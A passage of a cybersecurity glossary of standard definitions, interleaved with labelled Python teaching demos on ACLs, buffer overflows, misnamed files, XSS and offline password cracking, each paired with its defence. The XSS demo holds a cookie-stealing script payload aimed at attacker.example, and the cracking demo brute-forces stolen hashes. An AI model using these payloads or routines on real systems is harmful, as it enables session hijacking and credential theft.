Cybersecurity
Identity Management Software
- Automates keeping track of all users and their privileges
- Authenticates users, protects identities, and controls access
Authentication
- Password systems
- Tokens
- Smart cards
- Biometric authentication
Access Control List (ACL)
1. A list of permissions associated with an object. The list specifies who or what is allowed to access the object and what operations are allowed to be performed on the object. 2. A mechanism that implements access control for a system resource by enumerating the system entities that are permitted to access the resource and stating, either implicitly or explicitly, the access modes granted to each entity.
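As an added example (not part of this glossary), the following Python evaluates an ACL of the kind described above. It assumes entries name either a user or a group, that an explicit deny entry beats any allow entry, and that a subject with no matching entry is denied; the group membership and the ACL entries are constructed sample data.

```python
# Added example (not from the page): evaluating a simple ACL.
# Assumptions made here: entries name either a user or a group, an explicit
# deny entry beats any allow entry, and a subject with no matching entry is
# denied. The groups and the ACL below are constructed sample data.
from dataclasses import dataclass


@dataclass(frozen=True)
class AclEntry:
    principal: str          # "user:<name>" or "group:<name>"
    obj: str                # the protected object, e.g. a file path
    operations: frozenset   # access modes this entry covers
    allow: bool             # True grants the modes, False explicitly denies them


# Constructed group membership; a real system would query a directory service.
GROUPS = {
    "finance": {"alice", "bob"},
    "auditors": {"carol"},
}

# Constructed ACL protecting two objects.
ACL = [
    AclEntry("group:finance", "/ledger.xlsx", frozenset({"read", "write"}), True),
    AclEntry("group:auditors", "/ledger.xlsx", frozenset({"read"}), True),
    AclEntry("user:bob", "/ledger.xlsx", frozenset({"write"}), False),   # explicit deny
    AclEntry("user:alice", "/payroll.csv", frozenset({"read"}), True),
]


def principals_for(user: str) -> set:
    """Expand a user into every principal string that can match an ACL entry."""
    names = {f"user:{user}"}
    names.update(f"group:{g}" for g, members in GROUPS.items() if user in members)
    return names


def is_permitted(acl, user: str, obj: str, operation: str) -> bool:
    """True only if some allow entry matches and no deny entry matches."""
    names = principals_for(user)
    matching = [e for e in acl
                if e.obj == obj and e.principal in names and operation in e.operations]
    if any(not e.allow for e in matching):
        return False                       # explicit deny overrides every allow
    return any(e.allow for e in matching)  # nothing matched: default deny


def effective_rights(acl, user: str, obj: str,
                     all_ops=("read", "write", "execute")) -> set:
    """The access modes a user actually ends up with on one object."""
    return {op for op in all_ops if is_permitted(acl, user, obj, op)}


if __name__ == "__main__":
    for user in ("alice", "bob", "carol", "dave"):
        print(user, sorted(effective_rights(ACL, user, "/ledger.xlsx")))
```

Bob inherits read and write from the finance group, but the explicit deny on write removes write; Dave matches nothing and gets nothing, which is the default-deny behaviour an ACL should have.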
Blue Team
1. The group responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team). 2. The term Blue Team is also used for defining a group of individuals that conduct operational network vulnerability evaluations and provide mitigation techniques to customers who have a need for an independent technical review of their network security posture. The Blue Team identifies security threats and risks in the operating environment, and in cooperation with the customer, analyzes the network environment and its current state of security readiness. Based on the Blue Team's findings and expertise, they provide recommendations that integrate into an overall community security solution to increase the customer's cyber security readiness posture. Oftentimes a Blue Team is employed by itself or prior to a Red Team employment to ensure that the customer's networks are as secure as possible before having the Red Team test the systems.
White Team
1. The group responsible for refereeing an engagement between a Red Team of mock attackers and a Blue Team of actual defenders of their enterprise's use of information systems. In an exercise, the White Team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender's mission. The White Team helps to establish the rules of engagement, the metrics for assessing results and the procedures for providing operational security for the engagement. The White Team normally has responsibility for deriving lessons-learned, conducting the post engagement assessment, and promulgating results. 2. Can also refer to a small group of people who have prior knowledge of unannounced Red Team activities. The White Team acts as observers during the Red Team activity and ensures the scope of testing does not exceed a predefined threshold.
Access Level
A category within a given security classification limiting entry or system connectivity to only authorized persons. (SOURCE: CNSSI-4009)
Cross-Certificate
A certificate used to establish a trust relationship between two Certification Authorities.
Certification
A comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.
Trojan Horse
A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program.
Virus
A computer program that can copy itself and infect a computer without permission or knowledge of the user. A virus might corrupt or delete data on a computer, use email programs to spread itself to other computers, or even erase everything on a hard disk.
Buffer Overflow
A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.
Backup
A copy of files and programs made to facilitate recovery, if necessary.
IT Security Architecture
A description of security principles and an overall approach for complying with the principles that drive the system design; i.e., guidelines on the placement and implementation of specific security services within various distributed computing environments.
IT Security Awareness
The purpose of awareness presentations is simply to focus attention on security. Awareness presentations are intended to allow individuals to recognize IT security concerns and respond accordingly.
Wireless Access Point (WAP)
A device that acts as a conduit to connect wireless communication devices together to allow them to communicate and create a wireless network.
Certificate
1. A digital representation of information which at least 1) identifies the certification authority issuing it, 2) names or identifies its subscriber, 3) contains the subscriber's public key, 4) identifies its operational period, and 5) is digitally signed by the certification authority issuing it. 2. A set of data that uniquely identifies an entity, contains the entity's public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity. Additional information in the certificate could specify how the key is used and its cryptoperiod.
Radio Frequency Identification (RFID)
A form of automatic identification and data capture (AIDC) that uses electric or magnetic fields at radio frequencies to transmit information.
Firewall
1. A gateway that limits access between networks in accordance with local security policy. 2. A hardware/software capability that limits access between networks and/or systems in accordance with a specific security policy. 3. A device or program that controls the flow of network traffic between networks or hosts that employ differing security postures.
Cyberspace
A global domain within the information environment consisting of the interdependent network of information systems infrastructures including the Internet, telecommunications networks, computer systems, and embedded processors and controllers.
Red Team
A group of people authorized and organized to emulate a potential adversary's attack or exploitation capabilities against an enterprise's security posture. The Red Team's objective is to improve enterprise Information Assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.
Wireless Local Area Network (WLAN)
A group of wireless networking devices within a limited geographic area, such as an office building, that exchange data through radio communications. The security of each WLAN is heavily dependent on how well each WLAN component—including client devices, APs, and wireless switches—is secured throughout the WLAN lifecycle, from initial WLAN design and deployment through ongoing maintenance and monitoring.
Risk Model
A key component of a risk assessment methodology (in addition to assessment approach and analysis approach) that defines key terms and assessable risk factors.
Whitelist
A list of discrete entities, such as hosts or applications, that are known to be benign and are approved for use within an organization and/or information system.
Blacklist
1. A list of email senders who have previously sent spam to a user. 2. A list of discrete entities, such as hosts or applications, that have been previously determined to be associated with malicious activity.
Asset
A major application, general support system, high impact program, physical plant, mission critical system, personnel, equipment, or a logically related group of systems.
Compensating Security Control
1. A management, operational, and/or technical control (i.e., safeguard or countermeasure) employed by an organization in lieu of a recommended security control in the low, moderate, or high baselines that provides equivalent or comparable protection for an information system. 2. A management, operational, and technical control (i.e., safeguard or countermeasure) employed by an organization in lieu of the recommended control in the baselines described in NIST Special Publication 800-53 or in CNSS Instruction 1253 that provides equivalent or comparable protection for an information system.
Brute Force Password Attack
A method of gaining access to a locked (obstructed) device or account by trying many combinations of numeric and/or alphanumeric passwords until one succeeds.
Sandboxing
1. A method of isolating application modules into distinct fault domains enforced by software. The technique allows untrusted programs written in an unsafe language, such as C, to be executed safely within the single virtual address space of an application. Untrusted machine-interpretable code modules are transformed so that all memory accesses are confined to code and data segments within their fault domain. Access to system resources can also be controlled through a unique identifier associated with each domain. 2. A restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized.
Buffer Overflow Attack
A method of overloading a predefined amount of space in a buffer, which can potentially overwrite and corrupt data in memory.
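Added example (not part of this glossary) illustrating the Buffer Overflow and Buffer Overflow Attack entries: an unbounded copy into an 8-byte name field spills into the privilege flag stored directly after it in memory. Python's ctypes is used so the layout is explicit and the write stays inside the allocated object; the Session layout, its field names and the payload are assumptions made for the example.

```python
# Added example (not from the page): an unbounded copy spilling into the field
# stored right after the buffer. ctypes is used so the layout is explicit and
# the demonstration stays inside the allocated object; the Session layout and
# the payload are assumptions made for the example.
import ctypes


class Session(ctypes.Structure):
    _fields_ = [
        ("name", ctypes.c_char * 8),     # fixed 8-byte buffer
        ("is_admin", ctypes.c_uint32),   # sits immediately after it in memory
    ]


NAME_OFFSET = Session.name.offset        # 0
NAME_SIZE = Session.name.size            # 8


def vulnerable_set_name(session: Session, data: bytes) -> None:
    """Copies len(data) bytes into `name` with no check against NAME_SIZE.
    Anything past the eighth byte therefore overwrites `is_admin`. (The clamp
    to sizeof(Session) only keeps the demo from writing past the object.)"""
    count = min(len(data), ctypes.sizeof(Session))
    ctypes.memmove(ctypes.addressof(session) + NAME_OFFSET, data, count)


def hardened_set_name(session: Session, data: bytes) -> bool:
    """Refuses input that would not fit with a terminating NUL; never writes
    beyond the field. Returns False when the input is rejected."""
    if len(data) >= NAME_SIZE:
        return False
    ctypes.memmove(ctypes.addressof(session) + NAME_OFFSET,
                   data + b"\x00", len(data) + 1)
    return True


# Constructed payload: fill the 8-byte name, then supply the bytes of a native
# uint32 with value 1 so they land exactly on is_admin.
OVERFLOW_PAYLOAD = b"A" * NAME_SIZE + bytes(ctypes.c_uint32(1))


def run(data: bytes, hardened: bool) -> dict:
    """Apply one setter to a fresh unprivileged session and report the result."""
    session = Session(name=b"", is_admin=0)
    if hardened:
        accepted = hardened_set_name(session, data)
    else:
        vulnerable_set_name(session, data)
        accepted = True
    return {"accepted": accepted, "name": session.name, "is_admin": session.is_admin}


if __name__ == "__main__":
    print("vulnerable:", run(OVERFLOW_PAYLOAD, hardened=False))   # is_admin becomes 1
    print("hardened:  ", run(OVERFLOW_PAYLOAD, hardened=True))    # rejected, still 0
```

The hardened setter is the standard fix: compare the input length against the destination size before copying instead of trusting the caller. In native code the same overflow can reach saved return addresses and other control data, which is how crashes and code execution follow from the overwrite.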
Cloud Computing
A model for enabling on-demand network access to a shared pool of configurable IT capabilities/resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. It allows users to access technology-based services from the network cloud without knowledge of, expertise with, or control over the technology infrastructure that supports them. This cloud model is composed of five essential characteristics (on-demand self-service, ubiquitous network access, location-independent resource pooling, rapid elasticity, and measured service); three service delivery models (Cloud Software as a Service [SaaS], Cloud Platform as a Service [PaaS], and Cloud Infrastructure as a Service [IaaS]); and four models for enterprise access (Private cloud, Community cloud, Public cloud, and Hybrid cloud). Note: Both the user's data and essential security services may reside in and be managed within the network cloud.
External Network
A network not controlled by the organization.
Physically Isolated Network
A network that is not connected to entities or systems outside a physically controlled space.
Internal Network
1. A network where: (i) the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or (ii) cryptographic encapsulation or similar security technology provides the same effect. An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned. 2. A network where 1) the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or 2) cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints provides the same effect (at least with regard to confidentiality and integrity). An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned.
Network Sniffing
A passive technique that monitors network communication, decodes protocols, and examines headers and payloads for information of interest. It is both a review technique and a target identification and analysis technique.
Biometric
1. A physical or behavioral characteristic of a human being. 2. A measurable physical characteristic or personal behavioral trait used to recognize the identity, or verify the claimed identity, of an applicant. Facial images, fingerprints, and iris scan samples are all examples of biometrics.
Logic Bomb
A piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.
Remediation Plan
A plan to perform the remediation of one or more threats or vulnerabilities facing an organization's systems. The plan typically includes options to remove threats and vulnerabilities and priorities for performing the remediation.
Defense-in-Breadth
A planned, systematic set of multidisciplinary activities that seek to identify, manage, and reduce risk of exploitable vulnerabilities at every stage of the system, network, or sub-component life cycle (system, network, or product design and development; manufacturing; packaging; assembly; system integration; distribution; operations; maintenance; and retirement).
Root Cause Analysis
A principle-based, systems approach for the identification of underlying causes associated with a particular set of risks.
Intranet
A private network that is employed within the confines of a given enterprise (e.g., internal to a business or agency).
Key Logger
A program designed to record which keys are pressed on a computer keyboard; used to obtain passwords or encryption keys and thus bypass other security measures.
Spam Filtering Software
A program that analyzes emails to look for characteristics of spam, and typically places messages that appear to be spam in a separate email folder. (SOURCE: CNSSI-4009)
Malware
A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim's data, applications, or operating system or of otherwise annoying or disrupting the victim.
Zombie
A program that is installed on a system to cause it to attack other systems.
Antivirus Software
A program that monitors a computer or network to identify all major types of malware and prevent or contain malware incidents.
Antispyware Software
A program that specializes in detecting both malware and nonmalware forms of spyware.
Audit Trail
1. A record showing who has accessed an Information Technology (IT) system and what operations the user has performed during a given period. 2. A chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security-relevant transaction from inception to final result.
Graduated Security
A security system that provides several levels (e.g., low, moderate, high) of protection based on threats, risks, available technology, support services, time, human concerns, and economics.
Security Policy
A set of criteria for the provision of security services. It defines and constrains the activities of a data processing facility in order to maintain a condition of security for systems and data.
Threat Scenario
A set of discrete threat events, associated with a specific threat source or multiple threat sources, partially ordered in time.
Baseline Configuration
A set of specifications for a system, or Configuration Item (CI) within a system, that has been formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures. The baseline configuration is used as a basis for future builds, releases, and/or changes.
Rootkit
A set of tools used by an attacker after gaining root-level access to a host to conceal the attacker's activities on the host and permit the attacker to maintain root-level access to the host through covert means.
Application
1. A software program hosted by an information system. 2. A software program that performs a specific function directly for a user and can be executed without access to system control, monitoring, or administrative privileges.
Risk Management Framework
A structured approach used to oversee and manage risk for an enterprise.
Honeypot
A system (e.g., a Web server) or system resource (e.g., a file on a server) that is designed to be attractive to potential crackers and intruders and has no authorized users other than its administrators.
Misnamed Files
A technique used to disguise a file's content by changing the file's name to something innocuous or altering its extension to a different type of file, forcing the examiner to identify the files by file signature versus file extension.
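Added example (not part of this glossary) of the file-signature check the Misnamed Files entry refers to: the content type is read from the leading bytes of each file and compared with what the extension claims. The signature table, the extension aliases and the sample files are constructed for the example; a real triage tool carries many more signatures, some at non-zero offsets.

```python
# Added example (not from the page): identifying file content by signature
# and flagging names whose extension disagrees. The signature table, the
# extension aliases and the sample files are constructed for the example.
from typing import Dict, Optional

# Leading bytes of a few common formats (all at offset 0 in this table).
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
    "zip": b"PK\x03\x04",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "exe": b"MZ",          # Windows PE/DOS executable
    "elf": b"\x7fELF",     # Linux/Unix executable or shared object
}

# Extensions whose container really is one of the formats above.
ALIASES = {
    "jpeg": "jpg", "dll": "exe",
    "docx": "zip", "xlsx": "zip", "pptx": "zip", "jar": "zip", "apk": "zip",
}


def type_from_signature(data: bytes) -> Optional[str]:
    """What the bytes say the file is, or None if no known signature matches."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None


def type_from_extension(filename: str) -> Optional[str]:
    """What the name claims the file is, normalised through ALIASES."""
    if "." not in filename:
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return ALIASES.get(ext, ext)


def classify(filename: str, data: bytes) -> str:
    claimed = type_from_extension(filename)
    actual = type_from_signature(data)
    if actual is None:
        return "unknown-signature"      # text or an unlisted format: examine further
    if claimed == actual:
        return "match"
    return f"mismatch:{claimed}->{actual}"


def find_misnamed(files: Dict[str, bytes]) -> Dict[str, str]:
    """Only the files whose content type contradicts their extension."""
    verdicts = {name: classify(name, data) for name, data in files.items()}
    return {name: v for name, v in verdicts.items() if v.startswith("mismatch")}


# Constructed sample: the first bytes of each file, as an examiner would read them.
SAMPLE_FILES = {
    "holiday.jpg":  b"\xff\xd8\xff\xe0\x00\x10JFIF",     # genuine JPEG
    "report.pdf":   b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",    # genuine PDF
    "notes.txt":    b"MZ\x90\x00\x03\x00\x00\x00",        # PE executable renamed to .txt
    "cat.png":      b"PK\x03\x04\x14\x00\x00\x00",        # ZIP archive renamed to .png
    "invoice.docx": b"PK\x03\x04\x14\x00\x06\x00",        # docx is a ZIP container: fine
    "readme":       b"plain text, no signature",
}

if __name__ == "__main__":
    for name, verdict in find_misnamed(SAMPLE_FILES).items():
        print(f"{name}: {verdict}")
```

A file with no recognised signature is reported separately rather than as a match, since absence of a signature (plain text, an unlisted format, or a deliberately stripped header) is itself something the examiner should look at.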
Penetration Testing
1. A test methodology in which assessors, typically working under specific constraints, attempt to circumvent or defeat the security features of an information system. 2. Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.
Basic Testing
A test methodology that assumes no knowledge of the internal structure and implementation detail of the assessment object. Also known as black box testing.
Web Bug
1. A tiny image, invisible to a user, placed on Web pages in such a way to enable third parties to track use of Web servers and collect information about the user, including IP address, host name, browser type and version, operating system name and version, and cookies. (SOURCE: SP 800-28) 2. Malicious code, invisible to a user, placed on Web sites in such a way that it allows third parties to track use of Web servers and collect information about the user, including IP address, host name, browser type and version, operating system name and version, and Web browser cookie.
Interview
A type of assessment method that is characterized by the process of conducting discussions with individuals or groups within an organization to facilitate understanding, achieve clarification, or lead to the location of evidence, the results of which are used to support the determination of security control effectiveness over time.
Incident
1. A violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices. 2. An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies. 3. An assessed occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system; or the information the system processes, stores, or transmits; or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.
Virtual Private Network (VPN)
A virtual network, built on top of existing physical networks, that provides a secure communications tunnel for data and other information transmitted between networks.
Macro Virus
A virus that attaches itself to documents and uses the macro programming capabilities of the document's application to execute and propagate.
Cross Site Scripting (XSS)
A vulnerability that allows attackers to inject malicious script into an otherwise benign website. The injected script runs with the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data exchanged between the website and the client. Websites are vulnerable if they display user-supplied data from requests or forms without encoding or sanitizing it so that it cannot be executed.
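Added example (not part of this glossary): one search page rendered with raw interpolation and with output encoding, plus a parser-based check that reports whether injected markup became a live script element or event-handler attribute. The template, both payloads and the oracle's rules are constructed for the example.

```python
# Added example (not from the page): the same search page rendered with raw
# interpolation and with output encoding, plus a parser-based check for
# whether injected markup became live. Template, payloads and the oracle's
# rules are constructed for the example.
import html
from html.parser import HTMLParser

# Element-text context ({q}) and a double-quoted attribute context ({q_attr}).
TEMPLATE = '<p>Results for: {q}</p>\n<input name="q" value="{q_attr}">'


def render_vulnerable(query: str) -> str:
    """User input becomes part of the page's markup: XSS."""
    return TEMPLATE.format(q=query, q_attr=query)


def render_hardened(query: str) -> str:
    """html.escape(quote=True) encodes <, >, &, " and ' so the input stays
    data in both contexts this template uses."""
    safe = html.escape(query, quote=True)
    return TEMPLATE.format(q=safe, q_attr=safe)


class InjectionOracle(HTMLParser):
    """Tokenises the rendered page the way a browser would and records script
    elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, _value in attrs:
            if name.startswith("on"):
                self.event_handlers.append(name)


def injected_script_present(page: str) -> bool:
    """True if any script element or event-handler attribute exists in the
    page; the template contains neither, so any hit came from the input."""
    oracle = InjectionOracle()
    oracle.feed(page)
    oracle.close()
    return oracle.script_tags > 0 or bool(oracle.event_handlers)


# Constructed payloads: one for the text context, one that breaks out of the attribute.
PAYLOAD_TEXT = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)'

if __name__ == "__main__":
    for payload in (PAYLOAD_TEXT, PAYLOAD_ATTR):
        print("vulnerable executes:", injected_script_present(render_vulnerable(payload)))
        print("hardened executes:  ", injected_script_present(render_hardened(payload)))
```

html.escape covers element text and quoted attribute values, the two contexts this template uses. Input placed inside a URL, a script block, or a CSS value needs the encoding appropriate to that context instead, which is why templating engines escape per context rather than with one global filter.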
Disaster Recovery Plan (DRP)
1. A written plan for recovering one or more information systems at an alternate facility in response to a major hardware or software failure or destruction of facilities. 2. Management policy and procedures used to guide an enterprise response to a major loss of enterprise capability or damage to its facilities. 3. The DRP is the second plan needed by the enterprise risk managers and is used when the enterprise must recover (at its original facilities) from a loss of capability over a period of hours or days.
Risk Response
Accepting, avoiding, mitigating, sharing, or transferring risk to organizational operations (i.e., mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation.
Remote Access
1. Access to an organizational information system by a user (or an information system acting on behalf of a user) communicating through an external network (e.g., the Internet). 2. Access by users (or information systems) communicating external to an information system security perimeter. 3. The ability for an organization's users to access its nonpublic computing resources from external locations other than the organization's facilities. 4. Access to an organization's nonpublic information system by an authorized user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet).
Recovery Procedures
Actions necessary to restore data files of an information system and computational capability after a system failure.
Cyber Incident
Actions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system and/or the information residing therein. See Incident.
Computer Network Attack (CNA)
Actions taken through the use of computer networks to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves.
Countermeasure
1. Actions, devices, procedures, or techniques that meet or oppose (i.e., counter) a threat, a vulnerability, or an attack by eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken. 2. Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of an information system. Synonymous with security controls and safeguards.
Awareness (Information Security)
Activities which seek to focus an individual's attention on an (information security) issue or set of issues.
Chief Information Officer (CIO)
Agency official responsible for: 1) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency; 2) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and 3) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.
Information Security Policy
Aggregate of directives, regulations, rules, and practices that prescribes how an organization manages, protects, and distributes information.
False Positive
An alert that incorrectly indicates that malicious activity is occurring.
Business Impact Analysis (BIA)
1. An analysis of an information system's requirements, functions, and interdependencies used to characterize system contingency requirements and priorities in the event of a significant disruption. 2. An analysis of an enterprise's requirements, processes, and interdependencies used to characterize information system contingency requirements and priorities in the event of a significant disruption.
Major Application
An application that requires special attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Note: All federal applications require some level of protection. Certain applications, because of the information in them, however, require special management oversight and should be treated as major. Adequate security for other applications should be provided by security of the systems in which they operate.
Online Attack
An attack against an authentication protocol where the Attacker either assumes the role of a Claimant with a genuine Verifier or actively alters the authentication channel. The goal of the attack may be to gain authenticated access or learn authentication secrets.
Passive Attack
An attack against an authentication protocol where the Attacker intercepts data traveling along the network between the Claimant and Verifier, but does not alter the data (i.e., eavesdropping).
Jamming
1. An attack in which a device is used to emit electromagnetic energy on a wireless network's frequency to make it unusable. 2. An attack that attempts to interfere with the reception of broadcast communications.
Eavesdropping Attack
An attack in which an Attacker listens passively to the authentication protocol to capture information which can be used in a subsequent active attack to masquerade as the Claimant.
Man-in-the-middle Attack (MitM)
1. An attack on the authentication protocol run in which the Attacker positions himself between the Claimant and Verifier so that he can intercept and alter data traveling between them. 2. A form of active wiretapping attack in which the attacker intercepts and selectively modifies communicated data to masquerade as one or more of the entities involved in a communication association.
Flooding
An attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Distributed Denial of Service (DDoS)
An attack that uses many computers to perform a DoS attack.
Off-line Attack
An attack where the Attacker obtains some data (typically by eavesdropping on an authentication protocol run, or by penetrating a system and stealing security files) that he/she is able to analyze in a system of his/her own choosing.
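Added example (not part of this glossary) covering the Off-line Attack entry and the Brute Force Password Attack entry above: the attacker holds a copy of the stored password verifiers and tests candidates (a wordlist followed by a brute-force sweep of short all-digit PINs) on their own machine, where no lockout or rate limit applies. The stolen records, wordlist, salts and iteration count are constructed; the count is kept tiny so the example runs quickly, far below what a real deployment uses.

```python
# Added example (not from the page): an offline attack against stolen password
# verifiers, contrasting an unsalted fast hash with a salted, iterated one.
# The stolen records, the wordlist, the salts and the iteration count are
# constructed for the example; the count is far below a real deployment's.
import hashlib
import itertools
import string

WORDLIST = ["password", "letmein", "Summer2024", "qwerty", "hunter2"]
ITERATIONS = 200


def store_unsalted(password: str) -> str:
    """Weak scheme: SHA-256 of the password alone."""
    return hashlib.sha256(password.encode()).hexdigest()


def store_pbkdf2(password: str, salt: bytes, iterations: int) -> str:
    """Better scheme: per-user salt plus an iterated derivation."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def candidates(wordlist, max_pin_len: int = 4):
    """Dictionary words first, then a brute-force sweep of every all-digit PIN
    up to max_pin_len digits (the 'multiple combinations' of a brute-force attack)."""
    yield from wordlist
    for length in range(1, max_pin_len + 1):
        for digits in itertools.product(string.digits, repeat=length):
            yield "".join(digits)


def crack_unsalted_store(records: dict, wordlist) -> tuple:
    """One precomputed table serves every record: the candidate sweep is paid once."""
    table, work = {}, 0
    for cand in candidates(wordlist):
        table[store_unsalted(cand)] = cand
        work += 1
    found = {user: table.get(digest) for user, digest in records.items()}
    return found, work


def crack_salted_store(records: dict, salts: dict, iterations: int, wordlist) -> tuple:
    """Salt forces a fresh sweep per record; iterations multiply each guess's cost.
    `work` counts underlying hash iterations so it compares with the unsalted case."""
    found, work = {}, 0
    for user, digest in records.items():
        found[user] = None
        for cand in candidates(wordlist):
            work += iterations
            if store_pbkdf2(cand, salts[user], iterations) == digest:
                found[user] = cand
                break
    return found, work


# Constructed "stolen" credential store: the attacker copies this and works offline.
PASSWORDS = {"alice": "Summer2024", "bob": "0042", "carol": "Summer2024"}
SALTS = {"alice": b"\x01" * 16, "bob": b"\x02" * 16, "carol": b"\x03" * 16}
STOLEN_UNSALTED = {u: store_unsalted(p) for u, p in PASSWORDS.items()}
STOLEN_PBKDF2 = {u: store_pbkdf2(p, SALTS[u], ITERATIONS) for u, p in PASSWORDS.items()}

if __name__ == "__main__":
    print("unsalted:", crack_unsalted_store(STOLEN_UNSALTED, WORDLIST))
    print("salted:  ", crack_salted_store(STOLEN_PBKDF2, SALTS, ITERATIONS, WORDLIST))
```

With the unsalted store, alice and carol share a digest, so the attacker learns they share a password before cracking anything, and one table built from the candidate list cracks every record at once. Salting removes both shortcuts, and the iteration count multiplies the cost of every guess; none of this helps a user whose password is in the wordlist, which is why the online defences (lockout, rate limiting) and the offline defences (salt, slow hash) are both needed.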
Cyber Attack
An attack, via cyberspace, targeting an enterprise's use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.
Attack
1. An attempt to gain unauthorized access to system services, resources, or information, or an attempt to compromise system integrity. 2. Any kind of malicious activity that attempts to collect, disrupt, deny, degrade, or destroy information system resources or the information itself.
Information Security Architecture
An embedded, integral part of the enterprise architecture that describes the structure and behavior for an enterprise's security processes, information security systems, personnel and organizational sub-units, showing their alignment with the enterprise's mission and strategic plans.
Inside(r) Threat
An entity with authorized access (i.e., within the security domain) that has the potential to harm an information system or enterprise through destruction, disclosure, modification of data, and/or denial of service.
Inside Threat
An entity with authorized access that has the potential to harm an information system through destruction, disclosure, modification of data, and/or denial of service.
Image
An exact bit-stream copy of all electronic data on a device, performed in a manner that ensures that the information is not altered.
Red Team Exercise
An exercise, reflecting real-world conditions, that is conducted as a simulated adversarial attempt to compromise organizational missions and/or business processes to provide a comprehensive assessment of the security capability of the information system and organization.
Low-Impact System
An information system in which all three security objectives (i.e., confidentiality, integrity, and availability) are evaluated as low.
Demilitarized Zone (DMZ)
1. An interface on a routing firewall that is similar to the interfaces found on the firewall's protected side. Traffic moving between the DMZ and other interfaces on the protected side of the firewall still goes through the firewall and can have firewall protection policies applied. 2. A host or network segment inserted as a "neutral zone" between an organization's private network and the Internet. 3. Perimeter network segment that is logically between internal and external networks. Its purpose is to enforce the internal network's Information Assurance policy for external information exchange and to provide external, untrusted sources with restricted access to releasable information while shielding the internal networks from outside attacks.
Credential
An object or data structure that authoritatively binds an identity (and optionally, additional attributes) to a token possessed and controlled by a Subscriber.
Outside Threat
An unauthorized entity from outside the domain perimeter that has the potential to harm an Information System through destruction, disclosure, modification of data, and/or denial of service.
Outside(r) Threat
An unauthorized entity outside the security domain that has the potential to harm an information system through destruction, disclosure, modification of data, and/or denial of service.
Patch
An update to an operating system, application, or other software issued specifically to correct particular problems with the software.
Threat Monitoring
Analysis, assessment, and review of audit trails and other information collected for the purpose of searching out system events that may constitute violations of system security.
Threat
Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.
Event
Any observable occurrence in a system and/or network. Events sometimes provide an indication that an incident is occurring.
Security Information and Event Management (SIEM) Tool
Application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface.
Assessment Findings
